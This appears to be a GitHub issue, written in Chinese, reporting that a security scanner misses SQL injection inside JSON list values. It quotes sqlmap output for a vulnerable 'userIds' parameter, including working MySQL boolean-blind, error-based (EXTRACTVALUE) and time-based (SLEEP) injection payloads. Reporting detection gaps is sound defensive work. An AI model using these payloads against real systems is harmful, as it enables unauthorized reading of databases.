You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
sqlmap的日志如下:
sqlmap identified the following injection point(s) with a total of 426 HTTP(s) requests:
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' RLIKE (SELECT (CASE WHEN (5473=5473) THEN 0x6e3164646165323264653466373466383939336538336336 ELSE 0x28 END)) AND 'IlcB'='IlcB"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' AND EXTRACTVALUE(9553,CONCAT(0x5c,0x7178707a71,(SELECT (ELT(9553=9553,1))),0x7178706271)) AND 'ubrK'='ubrK"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: {"userIds":["n1ddae22de4f74f8993e83c6' RLIKE SLEEP(5) AND 'NkVF'='NkVF"],"uGroupIds":[],"privilegeName":"READER","resourceId":"p7a63bcf493fb49c4959633c","resourceType":"data-source"}
发现没有在列表值中注入探测点,所以这部分sql注入没有发现
通过burpsuite和sqlmap是能够发现该问题的
The text was updated successfully, but these errors were encountered: